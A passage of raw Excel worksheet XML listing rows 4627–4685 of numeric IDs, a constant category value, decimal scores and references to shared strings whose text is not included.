      <c r="C4627">
        <v>6739</v>
      </c>
      <c r="D4627">
        <v>2</v>
      </c>
      <c r="E4627">
        <v>0.98180001974105835</v>
      </c>
      <c r="F4627" t="s">
        <v>5592</v>
      </c>
      <c r="G4627" t="s">
        <v>9148</v>
      </c>
      <c r="H4627" t="s">
        <v>9149</v>
      </c>
    </row>
    <row r="4628" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4628" s="1">
        <v>4626</v>
      </c>
      <c r="B4628">
        <v>6738</v>
      </c>
      <c r="C4628">
        <v>6738</v>
      </c>
      <c r="D4628">
        <v>2</v>
      </c>
      <c r="E4628">
        <v>0.60110002756118774</v>
      </c>
      <c r="F4628" t="s">
        <v>5592</v>
      </c>
      <c r="G4628" t="s">
        <v>9150</v>
      </c>
      <c r="H4628" t="s">
        <v>9151</v>
      </c>
    </row>
    <row r="4629" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4629" s="1">
        <v>4627</v>
      </c>
      <c r="B4629">
        <v>6737</v>
      </c>
      <c r="C4629">
        <v>6737</v>
      </c>
      <c r="D4629">
        <v>2</v>
      </c>
      <c r="E4629">
        <v>0.53049999475479126</v>
      </c>
      <c r="F4629" t="s">
        <v>5592</v>
      </c>
      <c r="G4629" t="s">
        <v>9152</v>
      </c>
      <c r="H4629" t="s">
        <v>9153</v>
      </c>
    </row>
    <row r="4630" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4630" s="1">
        <v>4628</v>
      </c>
      <c r="B4630">
        <v>2670</v>
      </c>
      <c r="C4630">
        <v>2670</v>
      </c>
      <c r="D4630">
        <v>2</v>
      </c>
      <c r="E4630">
        <v>0.98869997262954712</v>
      </c>
      <c r="F4630" t="s">
        <v>5592</v>
      </c>
      <c r="G4630" t="s">
        <v>9154</v>
      </c>
      <c r="H4630" t="s">
        <v>9155</v>
      </c>
    </row>
    <row r="4631" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4631" s="1">
        <v>4629</v>
      </c>
      <c r="B4631">
        <v>2672</v>
      </c>
      <c r="C4631">
        <v>2672</v>
      </c>
      <c r="D4631">
        <v>2</v>
      </c>
      <c r="E4631">
        <v>0.67809998989105225</v>
      </c>
      <c r="F4631" t="s">
        <v>5592</v>
      </c>
      <c r="G4631" t="s">
        <v>9156</v>
      </c>
      <c r="H4631" t="s">
        <v>9157</v>
      </c>
    </row>
    <row r="4632" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4632" s="1">
        <v>4630</v>
      </c>
      <c r="B4632">
        <v>2673</v>
      </c>
      <c r="C4632">
        <v>2673</v>
      </c>
      <c r="D4632">
        <v>2</v>
      </c>
      <c r="E4632">
        <v>0.99299997091293335</v>
      </c>
      <c r="F4632" t="s">
        <v>5592</v>
      </c>
      <c r="G4632" t="s">
        <v>9158</v>
      </c>
      <c r="H4632" t="s">
        <v>9159</v>
      </c>
    </row>
    <row r="4633" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4633" s="1">
        <v>4631</v>
      </c>
      <c r="B4633">
        <v>2674</v>
      </c>
      <c r="C4633">
        <v>2674</v>
      </c>
      <c r="D4633">
        <v>2</v>
      </c>
      <c r="E4633">
        <v>0.99129998683929443</v>
      </c>
      <c r="F4633" t="s">
        <v>5592</v>
      </c>
      <c r="G4633" t="s">
        <v>9160</v>
      </c>
      <c r="H4633" t="s">
        <v>9161</v>
      </c>
    </row>
    <row r="4634" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4634" s="1">
        <v>4632</v>
      </c>
      <c r="B4634">
        <v>6735</v>
      </c>
      <c r="C4634">
        <v>6735</v>
      </c>
      <c r="D4634">
        <v>2</v>
      </c>
      <c r="E4634">
        <v>0.99790000915527344</v>
      </c>
      <c r="F4634" t="s">
        <v>5592</v>
      </c>
      <c r="G4634" t="s">
        <v>9162</v>
      </c>
      <c r="H4634" t="s">
        <v>9163</v>
      </c>
    </row>
    <row r="4635" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4635" s="1">
        <v>4633</v>
      </c>
      <c r="B4635">
        <v>2723</v>
      </c>
      <c r="C4635">
        <v>2723</v>
      </c>
      <c r="D4635">
        <v>2</v>
      </c>
      <c r="E4635">
        <v>0.91200000047683716</v>
      </c>
      <c r="F4635" t="s">
        <v>5592</v>
      </c>
      <c r="G4635" t="s">
        <v>9164</v>
      </c>
      <c r="H4635" t="s">
        <v>9165</v>
      </c>
    </row>
    <row r="4636" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4636" s="1">
        <v>4634</v>
      </c>
      <c r="B4636">
        <v>6709</v>
      </c>
      <c r="C4636">
        <v>6709</v>
      </c>
      <c r="D4636">
        <v>2</v>
      </c>
      <c r="E4636">
        <v>0.78759998083114624</v>
      </c>
      <c r="F4636" t="s">
        <v>5592</v>
      </c>
      <c r="G4636" t="s">
        <v>9166</v>
      </c>
      <c r="H4636" t="s">
        <v>9167</v>
      </c>
    </row>
    <row r="4637" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4637" s="1">
        <v>4635</v>
      </c>
      <c r="B4637">
        <v>2725</v>
      </c>
      <c r="C4637">
        <v>2725</v>
      </c>
      <c r="D4637">
        <v>2</v>
      </c>
      <c r="E4637">
        <v>0.99580001831054688</v>
      </c>
      <c r="F4637" t="s">
        <v>5592</v>
      </c>
      <c r="G4637" t="s">
        <v>9168</v>
      </c>
      <c r="H4637" t="s">
        <v>9169</v>
      </c>
    </row>
    <row r="4638" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4638" s="1">
        <v>4636</v>
      </c>
      <c r="B4638">
        <v>2779</v>
      </c>
      <c r="C4638">
        <v>2779</v>
      </c>
      <c r="D4638">
        <v>2</v>
      </c>
      <c r="E4638">
        <v>0.65160000324249268</v>
      </c>
      <c r="F4638" t="s">
        <v>5592</v>
      </c>
      <c r="G4638" t="s">
        <v>9170</v>
      </c>
      <c r="H4638" t="s">
        <v>9171</v>
      </c>
    </row>
    <row r="4639" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4639" s="1">
        <v>4637</v>
      </c>
      <c r="B4639">
        <v>6692</v>
      </c>
      <c r="C4639">
        <v>6692</v>
      </c>
      <c r="D4639">
        <v>2</v>
      </c>
      <c r="E4639">
        <v>0.69090002775192261</v>
      </c>
      <c r="F4639" t="s">
        <v>5592</v>
      </c>
      <c r="G4639" t="s">
        <v>9172</v>
      </c>
      <c r="H4639" t="s">
        <v>9173</v>
      </c>
    </row>
    <row r="4640" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4640" s="1">
        <v>4638</v>
      </c>
      <c r="B4640">
        <v>6690</v>
      </c>
      <c r="C4640">
        <v>6690</v>
      </c>
      <c r="D4640">
        <v>2</v>
      </c>
      <c r="E4640">
        <v>0.8353000283241272</v>
      </c>
      <c r="F4640" t="s">
        <v>5592</v>
      </c>
      <c r="G4640" t="s">
        <v>9174</v>
      </c>
      <c r="H4640" t="s">
        <v>9175</v>
      </c>
    </row>
    <row r="4641" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4641" s="1">
        <v>4639</v>
      </c>
      <c r="B4641">
        <v>6689</v>
      </c>
      <c r="C4641">
        <v>6689</v>
      </c>
      <c r="D4641">
        <v>2</v>
      </c>
      <c r="E4641">
        <v>0.99730002880096436</v>
      </c>
      <c r="F4641" t="s">
        <v>5592</v>
      </c>
      <c r="G4641" t="s">
        <v>9176</v>
      </c>
      <c r="H4641" t="s">
        <v>9177</v>
      </c>
    </row>
    <row r="4642" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4642" s="1">
        <v>4640</v>
      </c>
      <c r="B4642">
        <v>6688</v>
      </c>
      <c r="C4642">
        <v>6688</v>
      </c>
      <c r="D4642">
        <v>2</v>
      </c>
      <c r="E4642">
        <v>0.92869997024536133</v>
      </c>
      <c r="F4642" t="s">
        <v>5592</v>
      </c>
      <c r="G4642" t="s">
        <v>9178</v>
      </c>
      <c r="H4642" t="s">
        <v>9179</v>
      </c>
    </row>
    <row r="4643" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4643" s="1">
        <v>4641</v>
      </c>
      <c r="B4643">
        <v>2792</v>
      </c>
      <c r="C4643">
        <v>2792</v>
      </c>
      <c r="D4643">
        <v>2</v>
      </c>
      <c r="E4643">
        <v>0.79930001497268677</v>
      </c>
      <c r="F4643" t="s">
        <v>5592</v>
      </c>
      <c r="G4643" t="s">
        <v>9180</v>
      </c>
      <c r="H4643" t="s">
        <v>9181</v>
      </c>
    </row>
    <row r="4644" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4644" s="1">
        <v>4642</v>
      </c>
      <c r="B4644">
        <v>6685</v>
      </c>
      <c r="C4644">
        <v>6685</v>
      </c>
      <c r="D4644">
        <v>2</v>
      </c>
      <c r="E4644">
        <v>0.73610001802444458</v>
      </c>
      <c r="F4644" t="s">
        <v>5592</v>
      </c>
      <c r="G4644" t="s">
        <v>9182</v>
      </c>
      <c r="H4644" t="s">
        <v>9183</v>
      </c>
    </row>
    <row r="4645" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4645" s="1">
        <v>4643</v>
      </c>
      <c r="B4645">
        <v>6684</v>
      </c>
      <c r="C4645">
        <v>6684</v>
      </c>
      <c r="D4645">
        <v>2</v>
      </c>
      <c r="E4645">
        <v>0.56440001726150513</v>
      </c>
      <c r="F4645" t="s">
        <v>5592</v>
      </c>
      <c r="G4645" t="s">
        <v>9184</v>
      </c>
      <c r="H4645" t="s">
        <v>9185</v>
      </c>
    </row>
    <row r="4646" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4646" s="1">
        <v>4644</v>
      </c>
      <c r="B4646">
        <v>2801</v>
      </c>
      <c r="C4646">
        <v>2801</v>
      </c>
      <c r="D4646">
        <v>2</v>
      </c>
      <c r="E4646">
        <v>0.53579998016357422</v>
      </c>
      <c r="F4646" t="s">
        <v>5592</v>
      </c>
      <c r="G4646" t="s">
        <v>9186</v>
      </c>
      <c r="H4646" t="s">
        <v>9187</v>
      </c>
    </row>
    <row r="4647" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4647" s="1">
        <v>4645</v>
      </c>
      <c r="B4647">
        <v>6683</v>
      </c>
      <c r="C4647">
        <v>6683</v>
      </c>
      <c r="D4647">
        <v>2</v>
      </c>
      <c r="E4647">
        <v>0.50709998607635498</v>
      </c>
      <c r="F4647" t="s">
        <v>5592</v>
      </c>
      <c r="G4647" t="s">
        <v>9188</v>
      </c>
      <c r="H4647" t="s">
        <v>9189</v>
      </c>
    </row>
    <row r="4648" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4648" s="1">
        <v>4646</v>
      </c>
      <c r="B4648">
        <v>2806</v>
      </c>
      <c r="C4648">
        <v>2806</v>
      </c>
      <c r="D4648">
        <v>2</v>
      </c>
      <c r="E4648">
        <v>0.8320000171661377</v>
      </c>
      <c r="F4648" t="s">
        <v>5592</v>
      </c>
      <c r="G4648" t="s">
        <v>9190</v>
      </c>
      <c r="H4648" t="s">
        <v>9191</v>
      </c>
    </row>
    <row r="4649" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4649" s="1">
        <v>4647</v>
      </c>
      <c r="B4649">
        <v>2812</v>
      </c>
      <c r="C4649">
        <v>2812</v>
      </c>
      <c r="D4649">
        <v>2</v>
      </c>
      <c r="E4649">
        <v>0.99529999494552612</v>
      </c>
      <c r="F4649" t="s">
        <v>5592</v>
      </c>
      <c r="G4649" t="s">
        <v>9192</v>
      </c>
      <c r="H4649" t="s">
        <v>9193</v>
      </c>
    </row>
    <row r="4650" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4650" s="1">
        <v>4648</v>
      </c>
      <c r="B4650">
        <v>2813</v>
      </c>
      <c r="C4650">
        <v>2813</v>
      </c>
      <c r="D4650">
        <v>2</v>
      </c>
      <c r="E4650">
        <v>0.85350000858306885</v>
      </c>
      <c r="F4650" t="s">
        <v>5592</v>
      </c>
      <c r="G4650" t="s">
        <v>9194</v>
      </c>
      <c r="H4650" t="s">
        <v>9195</v>
      </c>
    </row>
    <row r="4651" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4651" s="1">
        <v>4649</v>
      </c>
      <c r="B4651">
        <v>2815</v>
      </c>
      <c r="C4651">
        <v>2815</v>
      </c>
      <c r="D4651">
        <v>2</v>
      </c>
      <c r="E4651">
        <v>0.99910002946853638</v>
      </c>
      <c r="F4651" t="s">
        <v>5592</v>
      </c>
      <c r="G4651" t="s">
        <v>9196</v>
      </c>
      <c r="H4651" t="s">
        <v>9197</v>
      </c>
    </row>
    <row r="4652" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4652" s="1">
        <v>4650</v>
      </c>
      <c r="B4652">
        <v>2820</v>
      </c>
      <c r="C4652">
        <v>2820</v>
      </c>
      <c r="D4652">
        <v>2</v>
      </c>
      <c r="E4652">
        <v>0.68849998712539673</v>
      </c>
      <c r="F4652" t="s">
        <v>5592</v>
      </c>
      <c r="G4652" t="s">
        <v>9198</v>
      </c>
      <c r="H4652" t="s">
        <v>9199</v>
      </c>
    </row>
    <row r="4653" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4653" s="1">
        <v>4651</v>
      </c>
      <c r="B4653">
        <v>2822</v>
      </c>
      <c r="C4653">
        <v>2822</v>
      </c>
      <c r="D4653">
        <v>2</v>
      </c>
      <c r="E4653">
        <v>0.99360001087188721</v>
      </c>
      <c r="F4653" t="s">
        <v>5592</v>
      </c>
      <c r="G4653" t="s">
        <v>9200</v>
      </c>
      <c r="H4653" t="s">
        <v>9201</v>
      </c>
    </row>
    <row r="4654" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4654" s="1">
        <v>4652</v>
      </c>
      <c r="B4654">
        <v>2823</v>
      </c>
      <c r="C4654">
        <v>2823</v>
      </c>
      <c r="D4654">
        <v>2</v>
      </c>
      <c r="E4654">
        <v>0.89800000190734863</v>
      </c>
      <c r="F4654" t="s">
        <v>5592</v>
      </c>
      <c r="G4654" t="s">
        <v>9202</v>
      </c>
      <c r="H4654" t="s">
        <v>9203</v>
      </c>
    </row>
    <row r="4655" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4655" s="1">
        <v>4653</v>
      </c>
      <c r="B4655">
        <v>2824</v>
      </c>
      <c r="C4655">
        <v>2824</v>
      </c>
      <c r="D4655">
        <v>2</v>
      </c>
      <c r="E4655">
        <v>0.86540001630783081</v>
      </c>
      <c r="F4655" t="s">
        <v>5592</v>
      </c>
      <c r="G4655" t="s">
        <v>9204</v>
      </c>
      <c r="H4655" t="s">
        <v>9205</v>
      </c>
    </row>
    <row r="4656" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4656" s="1">
        <v>4654</v>
      </c>
      <c r="B4656">
        <v>2825</v>
      </c>
      <c r="C4656">
        <v>2825</v>
      </c>
      <c r="D4656">
        <v>2</v>
      </c>
      <c r="E4656">
        <v>0.59130001068115234</v>
      </c>
      <c r="F4656" t="s">
        <v>5592</v>
      </c>
      <c r="G4656" t="s">
        <v>9206</v>
      </c>
      <c r="H4656" t="s">
        <v>9207</v>
      </c>
    </row>
    <row r="4657" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4657" s="1">
        <v>4655</v>
      </c>
      <c r="B4657">
        <v>2826</v>
      </c>
      <c r="C4657">
        <v>2826</v>
      </c>
      <c r="D4657">
        <v>2</v>
      </c>
      <c r="E4657">
        <v>0.99229997396469116</v>
      </c>
      <c r="F4657" t="s">
        <v>5592</v>
      </c>
      <c r="G4657" t="s">
        <v>9208</v>
      </c>
      <c r="H4657" t="s">
        <v>7163</v>
      </c>
    </row>
    <row r="4658" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4658" s="1">
        <v>4656</v>
      </c>
      <c r="B4658">
        <v>2827</v>
      </c>
      <c r="C4658">
        <v>2827</v>
      </c>
      <c r="D4658">
        <v>2</v>
      </c>
      <c r="E4658">
        <v>0.68790000677108765</v>
      </c>
      <c r="F4658" t="s">
        <v>5592</v>
      </c>
      <c r="G4658" t="s">
        <v>9209</v>
      </c>
      <c r="H4658" t="s">
        <v>9210</v>
      </c>
    </row>
    <row r="4659" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4659" s="1">
        <v>4657</v>
      </c>
      <c r="B4659">
        <v>6694</v>
      </c>
      <c r="C4659">
        <v>6694</v>
      </c>
      <c r="D4659">
        <v>2</v>
      </c>
      <c r="E4659">
        <v>0.99129998683929443</v>
      </c>
      <c r="F4659" t="s">
        <v>5592</v>
      </c>
      <c r="G4659" t="s">
        <v>9211</v>
      </c>
      <c r="H4659" t="s">
        <v>9212</v>
      </c>
    </row>
    <row r="4660" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4660" s="1">
        <v>4658</v>
      </c>
      <c r="B4660">
        <v>2776</v>
      </c>
      <c r="C4660">
        <v>2776</v>
      </c>
      <c r="D4660">
        <v>2</v>
      </c>
      <c r="E4660">
        <v>0.63880002498626709</v>
      </c>
      <c r="F4660" t="s">
        <v>5592</v>
      </c>
      <c r="G4660" t="s">
        <v>9213</v>
      </c>
      <c r="H4660" t="s">
        <v>9214</v>
      </c>
    </row>
    <row r="4661" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4661" s="1">
        <v>4659</v>
      </c>
      <c r="B4661">
        <v>6695</v>
      </c>
      <c r="C4661">
        <v>6695</v>
      </c>
      <c r="D4661">
        <v>2</v>
      </c>
      <c r="E4661">
        <v>0.99910002946853638</v>
      </c>
      <c r="F4661" t="s">
        <v>5592</v>
      </c>
      <c r="G4661" t="s">
        <v>9215</v>
      </c>
      <c r="H4661" t="s">
        <v>9216</v>
      </c>
    </row>
    <row r="4662" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4662" s="1">
        <v>4660</v>
      </c>
      <c r="B4662">
        <v>2774</v>
      </c>
      <c r="C4662">
        <v>2774</v>
      </c>
      <c r="D4662">
        <v>2</v>
      </c>
      <c r="E4662">
        <v>0.99290001392364502</v>
      </c>
      <c r="F4662" t="s">
        <v>5592</v>
      </c>
      <c r="G4662" t="s">
        <v>9217</v>
      </c>
      <c r="H4662" t="s">
        <v>9218</v>
      </c>
    </row>
    <row r="4663" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4663" s="1">
        <v>4661</v>
      </c>
      <c r="B4663">
        <v>2727</v>
      </c>
      <c r="C4663">
        <v>2727</v>
      </c>
      <c r="D4663">
        <v>2</v>
      </c>
      <c r="E4663">
        <v>0.71390002965927124</v>
      </c>
      <c r="F4663" t="s">
        <v>5592</v>
      </c>
      <c r="G4663" t="s">
        <v>9219</v>
      </c>
      <c r="H4663" t="s">
        <v>9220</v>
      </c>
    </row>
    <row r="4664" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4664" s="1">
        <v>4662</v>
      </c>
      <c r="B4664">
        <v>2728</v>
      </c>
      <c r="C4664">
        <v>2728</v>
      </c>
      <c r="D4664">
        <v>2</v>
      </c>
      <c r="E4664">
        <v>0.98269999027252197</v>
      </c>
      <c r="F4664" t="s">
        <v>5592</v>
      </c>
      <c r="G4664" t="s">
        <v>9221</v>
      </c>
      <c r="H4664" t="s">
        <v>9222</v>
      </c>
    </row>
    <row r="4665" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4665" s="1">
        <v>4663</v>
      </c>
      <c r="B4665">
        <v>2730</v>
      </c>
      <c r="C4665">
        <v>2730</v>
      </c>
      <c r="D4665">
        <v>2</v>
      </c>
      <c r="E4665">
        <v>0.5812000036239624</v>
      </c>
      <c r="F4665" t="s">
        <v>5592</v>
      </c>
      <c r="G4665" t="s">
        <v>9223</v>
      </c>
      <c r="H4665" t="s">
        <v>9224</v>
      </c>
    </row>
    <row r="4666" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4666" s="1">
        <v>4664</v>
      </c>
      <c r="B4666">
        <v>2732</v>
      </c>
      <c r="C4666">
        <v>2732</v>
      </c>
      <c r="D4666">
        <v>2</v>
      </c>
      <c r="E4666">
        <v>0.66579997539520264</v>
      </c>
      <c r="F4666" t="s">
        <v>5592</v>
      </c>
      <c r="G4666" t="s">
        <v>9225</v>
      </c>
      <c r="H4666" t="s">
        <v>9226</v>
      </c>
    </row>
    <row r="4667" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4667" s="1">
        <v>4665</v>
      </c>
      <c r="B4667">
        <v>2733</v>
      </c>
      <c r="C4667">
        <v>2733</v>
      </c>
      <c r="D4667">
        <v>2</v>
      </c>
      <c r="E4667">
        <v>0.86669999361038208</v>
      </c>
      <c r="F4667" t="s">
        <v>5592</v>
      </c>
      <c r="G4667" t="s">
        <v>9227</v>
      </c>
      <c r="H4667" t="s">
        <v>9228</v>
      </c>
    </row>
    <row r="4668" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4668" s="1">
        <v>4666</v>
      </c>
      <c r="B4668">
        <v>2736</v>
      </c>
      <c r="C4668">
        <v>2736</v>
      </c>
      <c r="D4668">
        <v>2</v>
      </c>
      <c r="E4668">
        <v>0.67229998111724854</v>
      </c>
      <c r="F4668" t="s">
        <v>5592</v>
      </c>
      <c r="G4668" t="s">
        <v>9229</v>
      </c>
      <c r="H4668" t="s">
        <v>9230</v>
      </c>
    </row>
    <row r="4669" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4669" s="1">
        <v>4667</v>
      </c>
      <c r="B4669">
        <v>2738</v>
      </c>
      <c r="C4669">
        <v>2738</v>
      </c>
      <c r="D4669">
        <v>2</v>
      </c>
      <c r="E4669">
        <v>0.93349999189376831</v>
      </c>
      <c r="F4669" t="s">
        <v>5592</v>
      </c>
      <c r="G4669" t="s">
        <v>9231</v>
      </c>
      <c r="H4669" t="s">
        <v>9232</v>
      </c>
    </row>
    <row r="4670" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4670" s="1">
        <v>4668</v>
      </c>
      <c r="B4670">
        <v>6706</v>
      </c>
      <c r="C4670">
        <v>6706</v>
      </c>
      <c r="D4670">
        <v>2</v>
      </c>
      <c r="E4670">
        <v>0.65729999542236328</v>
      </c>
      <c r="F4670" t="s">
        <v>5592</v>
      </c>
      <c r="G4670" t="s">
        <v>9233</v>
      </c>
      <c r="H4670" t="s">
        <v>9234</v>
      </c>
    </row>
    <row r="4671" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4671" s="1">
        <v>4669</v>
      </c>
      <c r="B4671">
        <v>6705</v>
      </c>
      <c r="C4671">
        <v>6705</v>
      </c>
      <c r="D4671">
        <v>2</v>
      </c>
      <c r="E4671">
        <v>0.92599999904632568</v>
      </c>
      <c r="F4671" t="s">
        <v>5592</v>
      </c>
      <c r="G4671" t="s">
        <v>9235</v>
      </c>
      <c r="H4671" t="s">
        <v>9236</v>
      </c>
    </row>
    <row r="4672" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4672" s="1">
        <v>4670</v>
      </c>
      <c r="B4672">
        <v>6703</v>
      </c>
      <c r="C4672">
        <v>6703</v>
      </c>
      <c r="D4672">
        <v>2</v>
      </c>
      <c r="E4672">
        <v>0.72259998321533203</v>
      </c>
      <c r="F4672" t="s">
        <v>5592</v>
      </c>
      <c r="G4672" t="s">
        <v>9237</v>
      </c>
      <c r="H4672" t="s">
        <v>9238</v>
      </c>
    </row>
    <row r="4673" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4673" s="1">
        <v>4671</v>
      </c>
      <c r="B4673">
        <v>2834</v>
      </c>
      <c r="C4673">
        <v>2834</v>
      </c>
      <c r="D4673">
        <v>2</v>
      </c>
      <c r="E4673">
        <v>0.53149998188018799</v>
      </c>
      <c r="F4673" t="s">
        <v>5592</v>
      </c>
      <c r="G4673" t="s">
        <v>9239</v>
      </c>
      <c r="H4673" t="s">
        <v>9240</v>
      </c>
    </row>
    <row r="4674" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4674" s="1">
        <v>4672</v>
      </c>
      <c r="B4674">
        <v>2746</v>
      </c>
      <c r="C4674">
        <v>2746</v>
      </c>
      <c r="D4674">
        <v>2</v>
      </c>
      <c r="E4674">
        <v>0.6600000262260437</v>
      </c>
      <c r="F4674" t="s">
        <v>5592</v>
      </c>
      <c r="G4674" t="s">
        <v>9241</v>
      </c>
      <c r="H4674" t="s">
        <v>9242</v>
      </c>
    </row>
    <row r="4675" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4675" s="1">
        <v>4673</v>
      </c>
      <c r="B4675">
        <v>2754</v>
      </c>
      <c r="C4675">
        <v>2754</v>
      </c>
      <c r="D4675">
        <v>2</v>
      </c>
      <c r="E4675">
        <v>0.37650001049041748</v>
      </c>
      <c r="F4675" t="s">
        <v>5592</v>
      </c>
      <c r="G4675" t="s">
        <v>9243</v>
      </c>
      <c r="H4675" t="s">
        <v>9244</v>
      </c>
    </row>
    <row r="4676" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4676" s="1">
        <v>4674</v>
      </c>
      <c r="B4676">
        <v>2755</v>
      </c>
      <c r="C4676">
        <v>2755</v>
      </c>
      <c r="D4676">
        <v>2</v>
      </c>
      <c r="E4676">
        <v>0.98720002174377441</v>
      </c>
      <c r="F4676" t="s">
        <v>5592</v>
      </c>
      <c r="G4676" t="s">
        <v>9245</v>
      </c>
      <c r="H4676" t="s">
        <v>9246</v>
      </c>
    </row>
    <row r="4677" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4677" s="1">
        <v>4675</v>
      </c>
      <c r="B4677">
        <v>2756</v>
      </c>
      <c r="C4677">
        <v>2756</v>
      </c>
      <c r="D4677">
        <v>2</v>
      </c>
      <c r="E4677">
        <v>0.82090002298355103</v>
      </c>
      <c r="F4677" t="s">
        <v>5592</v>
      </c>
      <c r="G4677" t="s">
        <v>9247</v>
      </c>
      <c r="H4677" t="s">
        <v>9248</v>
      </c>
    </row>
    <row r="4678" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4678" s="1">
        <v>4676</v>
      </c>
      <c r="B4678">
        <v>2761</v>
      </c>
      <c r="C4678">
        <v>2761</v>
      </c>
      <c r="D4678">
        <v>2</v>
      </c>
      <c r="E4678">
        <v>0.59899997711181641</v>
      </c>
      <c r="F4678" t="s">
        <v>5592</v>
      </c>
      <c r="G4678" t="s">
        <v>9249</v>
      </c>
      <c r="H4678" t="s">
        <v>9250</v>
      </c>
    </row>
    <row r="4679" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4679" s="1">
        <v>4677</v>
      </c>
      <c r="B4679">
        <v>2766</v>
      </c>
      <c r="C4679">
        <v>2766</v>
      </c>
      <c r="D4679">
        <v>2</v>
      </c>
      <c r="E4679">
        <v>0.99849998950958252</v>
      </c>
      <c r="F4679" t="s">
        <v>5592</v>
      </c>
      <c r="G4679" t="s">
        <v>9251</v>
      </c>
      <c r="H4679" t="s">
        <v>9252</v>
      </c>
    </row>
    <row r="4680" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4680" s="1">
        <v>4678</v>
      </c>
      <c r="B4680">
        <v>6696</v>
      </c>
      <c r="C4680">
        <v>6696</v>
      </c>
      <c r="D4680">
        <v>2</v>
      </c>
      <c r="E4680">
        <v>0.83329999446868896</v>
      </c>
      <c r="F4680" t="s">
        <v>5592</v>
      </c>
      <c r="G4680" t="s">
        <v>9253</v>
      </c>
      <c r="H4680" t="s">
        <v>9254</v>
      </c>
    </row>
    <row r="4681" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4681" s="1">
        <v>4679</v>
      </c>
      <c r="B4681">
        <v>2769</v>
      </c>
      <c r="C4681">
        <v>2769</v>
      </c>
      <c r="D4681">
        <v>2</v>
      </c>
      <c r="E4681">
        <v>0.46419999003410339</v>
      </c>
      <c r="F4681" t="s">
        <v>5592</v>
      </c>
      <c r="G4681" t="s">
        <v>9255</v>
      </c>
      <c r="H4681" t="s">
        <v>9256</v>
      </c>
    </row>
    <row r="4682" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4682" s="1">
        <v>4680</v>
      </c>
      <c r="B4682">
        <v>2770</v>
      </c>
      <c r="C4682">
        <v>2770</v>
      </c>
      <c r="D4682">
        <v>2</v>
      </c>
      <c r="E4682">
        <v>0.99849998950958252</v>
      </c>
      <c r="F4682" t="s">
        <v>5592</v>
      </c>
      <c r="G4682" t="s">
        <v>9257</v>
      </c>
      <c r="H4682" t="s">
        <v>9258</v>
      </c>
    </row>
    <row r="4683" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4683" s="1">
        <v>4681</v>
      </c>
      <c r="B4683">
        <v>2772</v>
      </c>
      <c r="C4683">
        <v>2772</v>
      </c>
      <c r="D4683">
        <v>2</v>
      </c>
      <c r="E4683">
        <v>0.61860001087188721</v>
      </c>
      <c r="F4683" t="s">
        <v>5592</v>
      </c>
      <c r="G4683" t="s">
        <v>9259</v>
      </c>
      <c r="H4683" t="s">
        <v>9260</v>
      </c>
    </row>
    <row r="4684" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4684" s="1">
        <v>4682</v>
      </c>
      <c r="B4684">
        <v>2773</v>
      </c>
      <c r="C4684">
        <v>2773</v>
      </c>
      <c r="D4684">
        <v>2</v>
      </c>
      <c r="E4684">
        <v>0.97909998893737793</v>
      </c>
      <c r="F4684" t="s">
        <v>5592</v>
      </c>
      <c r="G4684" t="s">
        <v>9261</v>
      </c>
      <c r="H4684" t="s">
        <v>9262</v>
      </c>
    </row>
    <row r="4685" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4685" s="1">
        <v>4683</v>
      </c>
      <c r="B4685">
        <v>6699</v>
      </c>
      <c r="C4685">
        <v>6699</v>
      </c>
      <c r="D4685">
        <v>2</v>
      </c>
      <c r="E4685">
        <v>0.99839997291564941</v>
      </c>
      <c r="F4685" t="s">
